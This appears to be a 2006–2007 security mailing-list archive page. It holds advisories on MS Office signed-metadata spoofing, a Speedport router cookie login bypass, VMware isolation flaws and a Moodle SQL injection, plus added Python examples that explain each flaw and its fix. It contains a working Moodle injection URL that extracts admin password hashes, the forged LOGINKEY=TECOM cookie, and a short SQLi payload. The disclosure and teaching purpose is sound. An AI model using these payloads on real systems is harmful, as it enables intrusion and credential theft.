> Subject: MS Office 2007: Digital Signature does not protect Meta-Data
> 
> Affects: Microsoft Office 2007 (12.0.6015.5000)
>          MSO (12.0.6017.5000)
>          possibly older versions
> 
> 
> I. Background
> 
> Microsoft Office is a suite containing several programs to
> handle Office documents like text documents or spreadsheets.
> The latest version uses an XML based document format.
> Microsoft Office allows documents to be digitally signed by
> authors using certified keys, allowing viewers to verify the
> integrity and the origin based on the author's public key.
> The author's public key certificate, which can come from a
> trusted third party, is embedded in the signed document.
> It is XML DSig based.
> 
> 
> II. Problem Description
> 
> Microsoft Office documents carry meta data information
> according to the DublinCore metadata in the file
> docProps/core.xml . Among this meta data information
> are the fields "LastModifiedBy", "creator" together with
> several others that can be displayed/changed through the
> following menu "Office Button -> Prepare -> Properties".
> These entries can be changed without invalidating the signature.
> At least under Windows Operating Systems this information is
> also shown in the Windows file system properties.
> 
> 
> III. Impact
> 
> The meta data of signed Microsoft Office documents can be
> changed. An attacker can change the values to spoof the origin
> of signed documents, hoping to induce trust or otherwise
> deceive the user.
> 
> 
> III.1. Proof of Concept
> 
> Open the OOXML ZIP container of a signed document.
> Change the values in the docProps/core.xml file.
> For example set the value between "*"
> to "FooBar".
> The changes will be displayed in the document's properties
> dialog as described above. The signature will still be valid.
> 
> 
> IV. Workaround
> 
> The meta data information of a signed OOXML document
> can be changed without invalidating the signature, thus
> information about the real author of a signed document can
> only be retrieved from the certificate.
> The signed file's meta data can not be trusted as the
> meta data is not covered by the signature.
> 
> 
> V. Solution
> 
> No possible solution.
> 
> 
> VI. Correctio
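
The practical check a reader of the advisory above wants is "which parts of this package does the signature actually cover?". The script below is an added example, not code from the advisory, from Microsoft or from any Office library. It assumes the OPC digital-signature layout (signature parts under `_xmlsignatures/`, each signed part listed as a `ds:Reference` whose URI is `/part/name?ContentType=...`); the package it builds is constructed in memory as a stand-in for a signed .docx, and its signature part carries no real SignatureValue. It then carries out the advisory's proof of concept, rewriting `dc:creator` in `docProps/core.xml`, and shows that the digests of every covered part are unchanged, which is why the signature still verifies.

```python
"""Which parts of an OOXML package does its XML-DSig signature cover?

Added example (not from the advisory, Microsoft or any Office library).
Assumes the OPC signature layout described in the lead-in; the package is
constructed in memory and is not a real Office document.
"""
import hashlib
import io
import zipfile
import xml.etree.ElementTree as ET

DS = "{http://www.w3.org/2000/09/xmldsig#}"
DC = "http://purl.org/dc/elements/1.1/"
CP = "http://schemas.openxmlformats.org/package/2006/metadata/core-properties"
ET.register_namespace("dc", DC)
ET.register_namespace("cp", CP)

# Constructed sample parts: a minimal stand-in for a signed Word document.
CORE_XML = (
    f'<cp:coreProperties xmlns:cp="{CP}" xmlns:dc="{DC}">'
    "<dc:creator>Alice</dc:creator><cp:lastModifiedBy>Alice</cp:lastModifiedBy>"
    "</cp:coreProperties>"
)
SIG_XML = """<Signature xmlns="http://www.w3.org/2000/09/xmldsig#" Id="idPackageSignature">
  <SignedInfo><Reference URI="#idPackageObject"/></SignedInfo>
  <SignatureValue>AAAA</SignatureValue>
  <Object Id="idPackageObject"><Manifest>
    <Reference URI="/word/document.xml?ContentType=application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"/>
    <Reference URI="/_rels/.rels?ContentType=application/vnd.openxmlformats-package.relationships+xml"/>
  </Manifest></Object>
</Signature>"""


def build_sample_package() -> bytes:
    """A signed-looking package whose manifest does NOT list docProps/core.xml."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("_rels/.rels", "<Relationships/>")
        z.writestr("word/document.xml", "<w:document>Signed body text</w:document>")
        z.writestr("docProps/core.xml", CORE_XML)
        z.writestr("_xmlsignatures/sig1.xml", SIG_XML)
    return buf.getvalue()


def manifest_part_names(sig_xml: bytes) -> set:
    """Part names listed in the signature's Manifest ('#...' same-document refs skipped)."""
    names = set()
    for ref in ET.fromstring(sig_xml).iter(DS + "Reference"):
        uri = ref.get("URI", "")
        if uri.startswith("/"):
            names.add(uri.split("?", 1)[0].lstrip("/"))
    return names


def signature_coverage(package: bytes):
    """Return (covered, uncovered) part-name sets for every signature in the package."""
    with zipfile.ZipFile(io.BytesIO(package)) as z:
        parts = {n for n in z.namelist() if not n.endswith("/")}
        covered = set()
        for n in parts:
            if n.startswith("_xmlsignatures/") and n.endswith(".xml"):
                covered |= manifest_part_names(z.read(n))
    # the signature parts and [Content_Types].xml are never in their own manifest
    uncovered = {n for n in parts - covered
                 if not n.startswith("_xmlsignatures/") and n != "[Content_Types].xml"}
    return covered & parts, uncovered


def covered_digests(package: bytes) -> dict:
    """SHA-256 of each covered part: what a verifier recomputes and compares."""
    covered, _ = signature_coverage(package)
    with zipfile.ZipFile(io.BytesIO(package)) as z:
        return {n: hashlib.sha256(z.read(n)).hexdigest() for n in sorted(covered)}


def creator_of(package: bytes) -> str:
    with zipfile.ZipFile(io.BytesIO(package)) as z:
        return ET.fromstring(z.read("docProps/core.xml")).findtext(f"{{{DC}}}creator")


def set_creator(package: bytes, creator: str) -> bytes:
    """The advisory's PoC: rewrite docProps/core.xml, leave every other part untouched."""
    out = io.BytesIO()
    with zipfile.ZipFile(io.BytesIO(package)) as src, zipfile.ZipFile(out, "w") as dst:
        for name in src.namelist():
            data = src.read(name)
            if name == "docProps/core.xml":
                root = ET.fromstring(data)
                root.find(f"{{{DC}}}creator").text = creator
                data = ET.tostring(root)
            dst.writestr(name, data)
    return out.getvalue()


if __name__ == "__main__":
    pkg = build_sample_package()
    print("not covered by the signature:", signature_coverage(pkg)[1])
    forged = set_creator(pkg, "FooBar")
    print("creator now:", creator_of(forged),
          "| covered digests unchanged:", covered_digests(forged) == covered_digests(pkg))
```

Note that this reads the manifest only and does not verify the signature itself; its value is the `uncovered` set, which on a real signed document is the list of parts whose contents you must not trust on the strength of the signature.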

Dell / Dell Financial Services - Contact

2007-12-10 Thread [EMAIL PROTECTED]
   I've recently found a design flaw in the Dell website regarding the 
shopping cart / purchasing system and was wondering if anyone could get 
me a contact to report it to?


Re: Win2K3 Priv Escalation

2007-11-28 Thread [EMAIL PROTECTED]
   Thanks for all the replies, he got himself in, and they should be 
contacting local authorities or at least a lawyer today. It's a 
manufacturing company and for some reason 2 of the key services were run 
under a user acct that once had admin permissions; without the 
administrative rights it wouldn't run and it couldn't be switched over 
to a system service because no one had rights to do so. A day's worth of 
work down the drain, gotta love rogue employees is all I can say.


Thanks again :)


Re: RFI In Script FlashChat_v479

2007-05-30 Thread [EMAIL PROTECTED]
I hope this event puts greater emphasis on *testing* bugs, instead of 
concentrating on speed of release.

-John Martinelli
RedLevel.org Security


Re: Defeating Citibank Virtual Keyboard protection using screenshot method

2007-05-17 Thread [EMAIL PROTECTED]

> If malware is running on the user's computer, can it change the
> destination of a funds transfer invisibly to the user, and still 
have
> the verification work?

Theoretically, this is possible. An advanced client-side MITM attack 
could be crafted, altering packets on-the-fly and returning a false 
confirmation page.

i.e.: 

normal response: "$100 USD has been transferred from [EMAIL PROTECTED] to 
[EMAIL PROTECTED]"
altered response: "$100 USD has been transferred from [EMAIL PROTECTED] 
to [EMAIL PROTECTED]"

-John Martinelli
RedLevel.org Security


RE: Apple Safari on MacOSX may reveal user's saved passwords

2007-05-14 Thread [EMAIL PROTECTED]
It may be possible to exploit this by simply accessing a malicious 
website, but I have not tested this.

Anyone willing to give it out a shot?

Thanks,
John Martinelli

redlevel security
redlevel.org - security training, consultation, and more.


Training Classes in SyScan'07

2007-05-09 Thread [EMAIL PROTECTED]

dear all

besides having free alcohol for all conference attendees at SyScan'07 this 
year, there will be seven (7) training classes at SyScan'07 this year. these 
classes are:

1. "securing your oracle database from hackers" by alexander kornbrust
2. "web application (in)security" by ngs software
3. "designing a secured voip network" by hendrik scholz
4. "practical wifi (in)security" by cedric blancher
5. "penetration testing voip network" by the grugq
6. "network storage security training" by isec partners
7. "building secured asp.net applications" by cosaire

training classes will be held on july 3rd - 4th, 2007 and the main conference 
will be held on july 5th - 6th, 2007.

those who sign up for these training classes by may 20th, 2007 will get to 
attend the conference for free. those who sign up for these classes after may 
20th, 2007 need to pay only S$300 (about us$200) for the conference.

please visit www.syscan.org for more details.

--
Thank you
Thomas Lim
Organiser
SyScan'07
www.syscan.org



SyScan'07 - Call for Paper - NEW UPDATES

2007-03-09 Thread [EMAIL PROTECTED]

dear all

here are some updates to the SyScan'07 call for paper:

1. new topic.
The following topics will be included:
a. Web 2.0 - web services, PHP, .Net, web applications

2. Speakers' Privileges.
a. Speakers at SyScan'07 with a brand new presentation will receive 
S$500 cash.
b. Selected speakers will get a chance to present at conferences either 
in Korea or India.


**

*CALL FOR PAPER/TRAINING*

*ABOUT SYSCAN'07*

The Symposium on Security for Asia Network (SyScan) aims to be a very 
different security conference from the rest of the security conferences 
that the information security community in Asia has come to be so 
familiar and frustrated with. SyScan intends to be a non-product, 
non-vendor biased security conference. It is the aspiration of SyScan to 
congregate, in Singapore, the best security experts in their various 
fields, to share their research, discovery and experience with all 
security enthusiasts in Asia.


Besides the main conference, there will also be specialized security 
training courses in SyScan'07. These classes will be held before the 
main conference.


SyScan'07 will be held in Singapore over at the Swissotel Merchant Court 
Hotel. The main conference will be held on 5th and 6th of July and the 
training will be held on 3^rd and 4^th of July, 2007.


*CFP Committee*
The Call for Paper committee for SyScan'07 comprises the following 
personnel:


1. Thomas Lim - Organiser of SyScan and CEO of COSEINC
2. Dave Aitel - Founder of Immunitysec
3. Marc Maiffret - Founder and Chief Hacking Officer of eEye
4. Matthew "Shok" Conover - Symantec
5. Ong Geok Meng - McAfee

The CFP committee will review all submissions and determine the final 
list of speakers for SyScan'07.


*Speakers*

*Speakers' Privileges:*

* Return economy class air-ticket for one person.
* 3 nights of accommodation.
* Breakfast, lunch and dinner during conference.
* After-conference party.
* A very healthy dose of alcohol and fun.
* S$500 cash for speakers with brand new presentation.
* Selected speakers will get a chance to present in Korea and India at 
the end of the year.


*Topics*

The focus for SyScan'07 will include the following:

*/Operating Systems/*

* Vista
* Linux

*/Mobile Devices/Embedded systems/*

* SmartPhones
* PDAs
* Game Consoles

*/Networking/Telecommunication/*

* VoIP
* 3G/3.5G network
* IPv6
* WLAN/WiFi
* GPRS

*/Industry specific/*

* Banking and Financial Services sectors

*/Malware/*

*/BotNets/*

*/Web 2.0/*

* Web services
* PHP
* .Net
* Web applications

Any topics that will catch the attention of the CFP committee and/or the 
world.


*TRAINERS*

*Trainers' Privileges:*

* 50% of net profit of class.
* 2 nights of accommodation (conference).
* After-conference party.
* A very healthy dose of alcohol and fun.

Please note that the net profit for each class is determined by the 
difference between the total fee collected for each class and the total 
expenses incurred for each class. The expenses of each class would 
include the return economy air-ticket of the trainer, 3 nights of 
accommodation (training) and the rental of the training venue.


*Topics*

SyScan'07 training topics will focus on the following areas:

Web Applications

* .Net applications
* Java applications

Networks

* VoIP
* 3G/3.5G network
* IPv6
* WLAN/WiFi
* GPRS

Databases

Storage

*CFP Submission:*

CFP submission must include the following information:

1) Brief biography including list of publications and papers published 
previously or training classes conducted previously.


2) Proposed presentation/training title, category, synopsis and 
description.


3) Contact Information (full name, alias, handler, e-mail, postal 
address, phone, fax, photo, country of origin, special dietary 
requirement).


4) Employment and/or affiliations information.

5) Any significant presentation and educational/training 
experience/background.


6) Why is your material different or innovative or significant or an 
important tutorial?


Please note that all speakers will be allocated 50 minutes of 
presentation time. Any speakers that require more time must inform the 
CFP committee during the CFP submission.


Training classes will be 2 full days. Please inform the CFP committee if 
your class is shorter or longer than 2 days during your CFP submission.


All submissions must be in English in either MS Office or PDF format. The 
more information you provide, the better the chance for selection. 
Please send submission to [EMAIL PROTECTED] <mailto:[EMAIL PROTECTED]>.


Submission for trainers must be done no later than 30th March 2007.

Submission for speakers must be done no later than 30th April 2007.

*Important Dates*

Final CFP Submission (Trainers) - 30th March 2007

Final CFP Submission (Speakers) - 30th April 200

Re: Wordpress <= v2.1.0

2007-03-06 Thread [EMAIL PROTECTED]
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

take a look at http://codex.wordpress.org/Roles_and_Capabilities

By design the administrator can post anything ... even js/html

[EMAIL PROTECTED] wrote:
> If you're logged in into wordpress as an admin, your comments aren't properly 
> sanitized, thus allowing an XSS to be posted. This can be exploited using 
> XSRF techniques.
> 
> More info & PoC: http://www.virtuax.be/advisories/Advisory4-20022007.txt

- --
Regards
Vladimir Vitkov
Operations Team
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.5 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFF7SZYoiOVExCFVC0RAgMfAKC62x+mbjzHlhTEQn3QZg9IIyJokgCgmf9w
G2DDt/YPlrn22KDNzWGbJx4=
=UJPB
-END PGP SIGNATURE-


VMware Workstation multiple denial of service and isolation manipulation vulnerabilities

2007-02-20 Thread [EMAIL PROTECTED]
"modify" setup mode.
2.2.3. In the components section - choose to remove only the "Toolbox"
component and continue with the setup. Restart the guest OS if asked to.
2.3. This step will remove the Toolbox files from their original locations,
any related registry values and the "VMware tools service" service.

The anti-manipulation "Lockout" feature (VM Workstation interface -> Edit
menu -> Preferences command -> Lockout tab) has been tested and affects
only the access to the interface of VMware workstation, thus only from
"outside" of the running VM, from the host OS - so it can't help with the
issues mentioned in this advisory.


Vendor Notification: The vendor was notified at the end of September 2006,
but it could not commit to any planned date for a fix regarding any of these
issues.


Credit:
Eitan Caspi
Israel
Email: [EMAIL PROTECTED]

 
Past security advisories:

1.
http://www.microsoft.com/technet/security/bulletin/MS02-003.mspx
http://support.microsoft.com/kb/315085/en-us
http://online.securityfocus.com/bid/4053

2.
http://support.microsoft.com/?kbid=329350
http://online.securityfocus.com/bid/5972

3.
http://www.securityfocus.com/archive/1/301624
http://online.securityfocus.com/bid/6280

4.
http://online.securityfocus.com/archive/1/309442
http://online.securityfocus.com/bid/6736

5.
http://www.securityfocus.com/archive/1/314361
http://www.securityfocus.com/bid/7046

6.
http://www.securityfocus.com/archive/1/393800

7.
http://www.securityfocus.com/archive/1/archive/1/434704/100/0/threaded

8.
http://www.securityfocus.com/archive/1/archive/1/446220/100/0/

9.
http://www.securityfocus.com/archive/1/459140/30/90/threaded
http://www.securityfocus.com/bid/22413


Articles:
You can find several articles I have written (translated to English) at
http://www.themarker.com/eng/archive/one.jhtml
(filter: Author = Eitan Caspi (second names set), From year = 2000 , Until
year = 2002)


Eitan Caspi
Israel

Current Blog (Hebrew): http://blog.tapuz.co.il/eitancaspi
Past Blog (Hebrew): http://www.notes.co.il/eitan
Dead Blog (English): http://eitancaspi.blogspot.com

"Technology is like sex. No Hands On - No Fun." (Eitan Caspi)




VMware workstation guest isolation weaknesses (clipboard transfer)

2007-02-05 Thread [EMAIL PROTECTED]
ext is the same as the one copied from the host OS.
7. Turn off the "Enable copy and paste to and from this virtual machine"
from the VM settings and click OK.
8. Repeat steps 3 to 6 and verify you are able to perform them, although the
relevant option is now "disabled".
9. You can repeat steps 1 to 8 but this time in the other way round, by
starting with the check box as un-checked.
10. Activate the change by performing one of the following operations
towards the guest OS: either suspend and resume, reset (from the VMware
hosting application), restart (from within the guest OS), shutdown (either
from within the guest OS or by performing a "power off" from the VMware
hosting application) and then turning it back on.
After performing either operation make sure the change was applied.

Issue 2:
1. When the test VM is turned off (one with the "VMware tools"
pre-installed), make sure the "Enable copy and paste to and from this
virtual machine" checkbox is checked (VM settings -> "Options" tab -> "Guest
Isolation" line -> "Enable copy and paste to and from this virtual
machine").
2. Turn on the VM and log into the guest OS.
3. Move the focus the host OS and copy the word "password".
4. Move to the focus to the guest OS and paste the clipboard into any text
field.
5. Make sure the word "password" is displayed.
6. Move back to the host OS and clear the clipboard content. Make sure it is
clear by pasting its content to a text field and verify nothing was pasted.
7. Move the focus to the guest OS and then back to the host OS and again
perform a paste action to a text field.
9. Verify that now the clipboard has pasted the word "password".


Exploit Code: No need.


Direct resolution: Not any that I am aware of at the time of writing this
advisory.

 
Workarounds: 
Issue 1: No workaround was found.

Issue 2: Disabling the clipboard transfer on a global level, for all of the
VMs immediately - by clearing the following checkbox in VMware workstation
interface:
"Edit" menu -> "Preferences" command -> "Input" tab -> "Enable copy and
paste to and from virtual machine".
If this global option is turned off, then at each VM level, clipboard copy,
in any direction, will not be allowed, regardless of the current actual
clipboard copy status at each VM.
Remember that this option affects ALL of the virtual machines used within
the VMware workstation.


Vendor Notification: The vendor was notified at the end of September 2006,
but it could not commit to any planned date for a fix regarding both issues.


Credit:
Eitan Caspi
Israel
Email: [EMAIL PROTECTED]

 
Past security advisories:

1.
http://www.microsoft.com/technet/security/bulletin/MS02-003.mspx
http://support.microsoft.com/kb/315085/en-us
http://online.securityfocus.com/bid/4053

2.
http://support.microsoft.com/?kbid=329350
http://online.securityfocus.com/bid/5972

3.
http://www.securityfocus.com/archive/1/301624
http://online.securityfocus.com/bid/6280

4.
http://online.securityfocus.com/archive/1/309442
http://online.securityfocus.com/bid/6736

5.
http://www.securityfocus.com/archive/1/314361
http://www.securityfocus.com/bid/7046

6.
http://www.securityfocus.com/archive/1/393800

7.
http://www.securityfocus.com/archive/1/archive/1/434704/100/0/threaded

8.
http://www.securityfocus.com/archive/1/archive/1/446220/100/0/



Articles:
You can find some articles I have written at
http://www.themarker.com/eng/archive/one.jhtml
(filter: Author = Eitan Caspi (second name set), From year = 2000 , Until
year = 2002)


Eitan Caspi
Israel

Current Blog (Hebrew): http://blog.tapuz.co.il/eitancaspi
Past Blog (Hebrew): http://www.notes.co.il/eitan 
Dead Blog (English): http://eitancaspi.blogspot.com

"Technology is like sex. No Hands On - No Fun." (Eitan Caspi)


-- 
No virus found in this outgoing message.
Checked by AVG Free Edition.
Version: 7.5.432 / Virus Database: 268.17.22/666 - Release Date: 03/02/2007
15:31
 



Re: Virginity Security Advisory 2007-001 : T-Com Speedport 500V Login bypass

2007-01-22 Thread [EMAIL PROTECTED]
Since this is not the first security problem on this router, and 
Deutsche Telekom really does not care,
I advise everyone to use alternative means of routing / dialing up. The 
modem shipped in conjunction with
this router requires VLAN support. Dialup requests will only be served 
on VLAN.7


More information can be found on man-wiki; although it deals with the 
700V, which has the same security problems, it also applies to the 500V 
version:
http://man-wiki.net/index.php/T-Home_IPTV_without_speedport_W_700V
and
http://man-wiki.net/index.php/T-Home_IPTV_over_wireless_bridge



On Linux a "vconfig add eth0 7" will allow you to dial up without the 
Speedport 500V


Regards,
Amir Mohammadkhani (http://www.mohammadkhani.eu/)



[EMAIL PROTECTED] schrieb:

- - - 
Virginity Security Advisory 2007-001
- - - 
 DATE : 2007-01-19 15:32 GMT
 TYPE : remote
VERSIONS AFFECTED : T-Com Speedport 500V Firmware 1.31
   AUTHOR : Virginity
  ADVISORY NUMBER : 005
- - - 


Description:

The Speedport 500V is a broadband-router which is sold in germany along
with ADSL lines. (just so you know)

The system is stupid and verifies whether you have entered the correct
password by setting a cookie with the content LOGINKEY=TECOM
(this is hardcoded and can not be changed).
If an attacker simply creates this cookie he can bypass password 
authentication by simply calling the configuration html sites directly.


The attacker then has nearly full system access (you cannot change the
system password without knowing the old one) and can change system
configuration e.g. disable the firewall. You can also perform a firmware
upgrade, which allows you to reset the password to the default one, which
now gives you full system access.

Vendor has not been notified. I don't think they care^^.

- - - 


Example:

Create a cookie like this:

Name: LOGINKEY
Content: TECOM
Host:  <- replace this by your router's IP address ;)
Path: /
Expires: Never

create a html page like this and open it in your browser:



  



  





this will bypass the login screen and lead you directly to configuration 
menu.


- - - 


Workaround:

Download the source code from the vendor (GPL), replace TECOM with something
else, try building it, and then try installing it on the hardware.
I did not try this. It's stupid and does not really solve the problem.

- - - 


Personal note:

Still here... sadly not dead yet. maybe i should hack the NSA so they kill
me? *lol* guess i'd have to learn some real things greetz to s.
and that other admin.

- - - 
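
The flaw in the advisory above is that the "proof of login" is a constant: whoever knows the string TECOM is logged in. The following added example (not code from the Speedport firmware or from the advisory) models that check next to the usual fix, a random per-login session token that the server issues only after a correct password and remembers. The password value, the cookie name of the hardened version and the request shape are assumptions made for the demonstration.

```python
"""Hard-coded login cookie (Speedport-style) beside a random per-login session token.

Added example; not firmware code. The weak class reproduces the check the
advisory describes (cookie LOGINKEY=TECOM == authenticated). The password,
the SESSION cookie name and the request shape are assumptions.
"""
import hmac
import secrets
from http.cookies import SimpleCookie

ADMIN_PASSWORD = "correct-horse"  # constructed sample credential


def _cookie(header: str, name: str):
    """Value of `name` in a Cookie request header, or None."""
    jar = SimpleCookie()
    jar.load(header or "")
    morsel = jar.get(name)
    return morsel.value if morsel is not None else None


class HardcodedKeyAuth:
    """Weak: the cookie value is a constant baked into the firmware, so it is not a secret."""
    LOGIN_KEY = "TECOM"

    def login(self, password: str):
        if hmac.compare_digest(password.encode(), ADMIN_PASSWORD.encode()):
            return f"LOGINKEY={self.LOGIN_KEY}; Path=/"
        return None

    def is_authenticated(self, cookie_header: str) -> bool:
        # Anyone who sends LOGINKEY=TECOM passes, login or not.
        return _cookie(cookie_header, "LOGINKEY") == self.LOGIN_KEY


class SessionTokenAuth:
    """Hardened: a fresh random token per successful login, remembered server-side."""

    def __init__(self):
        self._sessions = set()

    def login(self, password: str):
        if not hmac.compare_digest(password.encode(), ADMIN_PASSWORD.encode()):
            return None
        token = secrets.token_urlsafe(32)  # 256 bits of CSPRNG output, unguessable
        self._sessions.add(token)
        return f"SESSION={token}; Path=/; HttpOnly; SameSite=Strict"

    def is_authenticated(self, cookie_header: str) -> bool:
        token = _cookie(cookie_header, "SESSION")
        return token is not None and token in self._sessions

    def logout(self, cookie_header: str) -> None:
        self._sessions.discard(_cookie(cookie_header, "SESSION"))


FORGED_COOKIE = "LOGINKEY=TECOM"  # exactly the cookie the advisory tells the attacker to create


def forged_cookie_grants_access(auth) -> bool:
    """Does sending the hard-coded cookie, with no login at all, pass the check?"""
    return auth.is_authenticated(FORGED_COOKIE)


def set_cookie_to_cookie_header(set_cookie: str) -> str:
    """'NAME=value; attrs' from Set-Cookie -> the 'NAME=value' a browser sends back."""
    return set_cookie.split(";", 1)[0]


def real_login_grants_access(auth, password: str) -> bool:
    """Honest client: log in, echo the issued cookie back, check the result."""
    set_cookie = auth.login(password)
    if set_cookie is None:
        return False
    return auth.is_authenticated(set_cookie_to_cookie_header(set_cookie))


if __name__ == "__main__":
    for auth in (HardcodedKeyAuth(), SessionTokenAuth()):
        print(type(auth).__name__,
              "forged cookie:", forged_cookie_grants_access(auth),
              "| real login:", real_login_grants_access(auth, ADMIN_PASSWORD),
              "| wrong password:", real_login_grants_access(auth, "nope"))
```

The hardened version also fixes the advisory's other observation in passing: because a token only exists after a password check, the "firmware upgrade resets the password" path is no longer reachable without first authenticating.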
  




[NGSEC] ngGame #3 - BrainStorming

2007-01-01 Thread [EMAIL PROTECTED]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

NGSEC is proud to announce its third security game:

 "NGSEC's Security Game #3 - BrainStorming"

About NGSEC Games:
- --

NGSEC's games are a set of security challenges useful for anyone
interested in security or hacking. At the Games you'll be presented a set
of challenges you'll have to solve in order to gain access to each
following stage.

About Game #3:
- --

NGSEC's Security Game #3 - BrainStorming has 5 levels. Difficulty
grows every level, so first levels are very, very easy. On each level you
will be presented a form asking you to authenticate. You do not know
the user and the password, the goal is to bypass the authentication
mechanism.

Please note you are NOT allowed to:
  - Hack the game-server.
  - Brute force the authentication mechanism.

By playing this game, you accept and agree these simple rules.

Start playing NGSEC's Games at:

  http://quiz.ngsec.com/

Please note ngGame #3 has the launch date in a few hours "01-Jan-2007" 
00:01

Madrid's time.

- --
Next Generation Security S.L. - NGSEC
http://www.ngsec.com

C\O´Donnell nº 46, 3ºB
28009 Madrid
Spain
Tel: +34 91 837 19 91
Fax: +34 91 577 84 45

Find NGSEC labs public key at: http://www.ngsec.com/pgp/labs.asc

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.5 (GNU/Linux)

iD8DBQFFl+C1KrwoKcQl8Y4RAlUyAJ9jkExKJB4LZS7KdpQJPTm4ChfPLQCfb7NN
2cGHVqBEcaNZhyYf/tBDpWI=
=gKdp
-END PGP SIGNATURE-



Re: Multiple Vendor Unusual MIME Encoding Content Filter Bypass

2006-12-07 Thread [EMAIL PROTECTED]
Tomasz Kojm wrote:
> That's _extremely_ irresponsible to disclose bugs without giving the vendors
> any chance to fix them and prepare new software releases.

bla bla bla, full disclosure is cheaper

i really hate responsible disclosure criers, it's a personal choice,
you can't cry if somebody wants to do that different

we are speaking about MIME!! don't you think that an AV should be aware
of this? and about the BOF.. who cares.. the interesting part here is
the mime trick not the clamav dos

very interesting paper Hendrik

regards,
Michele Sandrelli


Re: [Full-disclosure] SQL injection - moodle

2006-10-09 Thread [EMAIL PROTECTED] com br
A security vulnerability was recently discovered in all versions of
Moodle 1.6 and later that allows SQL injection. A quick one-line fix has
already been added to CVS to patch this problem for 1.6.x and 1.7 versions.

Update your servers using CVS as soon as possible, or edit the file
blog/index.php in your copy manually as described here:

http://cvs.moodle.com/blog/index.php?r1=1.18.2.2&r2=1.18.2.3

Att,

Silvio Cesar L. dos Santos
Analista de Redes Pleno
DTI - Divisão de Tecnologia da Informação
UNIGRANRIO - Universidade do Grande Rio
+55 21 2672-7720
[EMAIL PROTECTED]
[EMAIL PROTECTED]
http://www.unigranrio.br


disfigure wrote:
> //
> http://www.w4cking.com
> 
> Product:
> moodle 1.6.2
> http://www.moodle.org
> 
> Vulnerability:
> SQL injection
> 
> Notes:
> - SQL injection can be used to obtain password hash
> - the moodle blog "module" must be enabled
> - guest access to the blog must be enabled
> 
> POC:
> /blog/index.php?tag=x%2527%20UNION%20SELECT%20%2527-1%20UNION%20SELECT%201,1,1,1,1,1,1,username,password,1,1,1,1,1,1,1,username,password,email%20FROM%20mdl_user%20RIGHT%20JOIN%20mdl_user_admins%20ON%20mdl_user.id%3dmdl_user_admins.userid%20UNION%20SELECT%201,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1%20FROM%20mdl_post%20p,%20mdl_blog_tag_instance%20bt,%20mdl_user%20u%20WHERE%201%3D0%2527,1,1,%25271
> 
> 
> Original advisory (requires registration):
> http://w4ck1ng.com/board/showthread.php?t=1305
> //
> 
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
> 
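
The PoC above is double URL-encoded (`%2527` becomes `%27` and only then `'`), which hides what actually reaches the query. The added example below (not Moodle's code; its schema, query and short payload are a constructed stand-in, and the real 19-column query behind `blog/index.php` is not reproduced) first decodes the posted URL to show the injected SQL, then reproduces the same class of bug against an in-memory SQLite database, with the string-spliced query beside its parameterised form. Table names follow the ones visible in the PoC; all rows are sample data.

```python
"""Moodle blog-tag SQL injection: decode the posted PoC, then reproduce the bug class.

Added example; schema, query and SHORT_PAYLOAD are a constructed stand-in,
not Moodle's blog/index.php. Rows are sample data.
"""
import sqlite3
from urllib.parse import parse_qs, unquote, urlsplit

# The PoC URL from the advisory, verbatim.
POC_URL = ("/blog/index.php?tag=x%2527%20UNION%20SELECT%20%2527-1%20UNION%20SELECT%20"
           "1,1,1,1,1,1,1,username,password,1,1,1,1,1,1,1,username,password,email%20"
           "FROM%20mdl_user%20RIGHT%20JOIN%20mdl_user_admins%20ON%20mdl_user.id%3d"
           "mdl_user_admins.userid%20UNION%20SELECT%201,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1"
           "%20FROM%20mdl_post%20p,%20mdl_blog_tag_instance%20bt,%20mdl_user%20u%20"
           "WHERE%201%3D0%2527,1,1,%25271")


def decode_poc_tag(url: str) -> str:
    """The `tag` value after two rounds of URL decoding: %2527 -> %27 -> '.
    The quote that ends the SQL string literal only appears after the second decode."""
    once = parse_qs(urlsplit(url).query)["tag"][0]  # first decode: %25 -> %
    return unquote(once)                             # second decode: %27 -> '


def setup_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE mdl_user (id INTEGER, username TEXT, password TEXT, email TEXT);
        CREATE TABLE mdl_user_admins (userid INTEGER);
        CREATE TABLE mdl_post (id INTEGER, subject TEXT, summary TEXT);
        CREATE TABLE mdl_blog_tag_instance (entryid INTEGER, tag TEXT);
        -- sample rows (constructed); the admin hash is md5('password')
        INSERT INTO mdl_user VALUES (2, 'admin', '5f4dcc3b5aa765d61d8327deb882cf99', 'admin@example.org');
        INSERT INTO mdl_user VALUES (3, 'bob', '9f9d51bc70ef21ca5c14f307980a29d8', 'bob@example.org');
        INSERT INTO mdl_user_admins VALUES (2);
        INSERT INTO mdl_post VALUES (1, 'Welcome', 'first entry');
        INSERT INTO mdl_blog_tag_instance VALUES (1, 'news');
    """)
    return db


_TAG_QUERY = ("SELECT p.id, p.subject, p.summary FROM mdl_post p "
              "JOIN mdl_blog_tag_instance bt ON bt.entryid = p.id WHERE bt.tag = ")


def posts_by_tag_vulnerable(db, tag: str):
    """User input spliced into the SQL text: a quote inside `tag` ends the literal."""
    return db.execute(_TAG_QUERY + f"'{tag}'").fetchall()


def posts_by_tag_safe(db, tag: str):
    """Bound parameter: the whole value stays one string, quotes included."""
    return db.execute(_TAG_QUERY + "?", (tag,)).fetchall()


# Three columns, matching the three the stand-in query selects; admin rows
# only, selected through mdl_user_admins as the advisory's PoC does.
SHORT_PAYLOAD = ("x' UNION SELECT u.id, u.username, u.password FROM mdl_user u "
                 "JOIN mdl_user_admins a ON a.userid = u.id WHERE '1'='1")


if __name__ == "__main__":
    print(decode_poc_tag(POC_URL))
    db = setup_db()
    print("vulnerable:", posts_by_tag_vulnerable(db, SHORT_PAYLOAD))
    print("safe      :", posts_by_tag_safe(db, SHORT_PAYLOAD))
```

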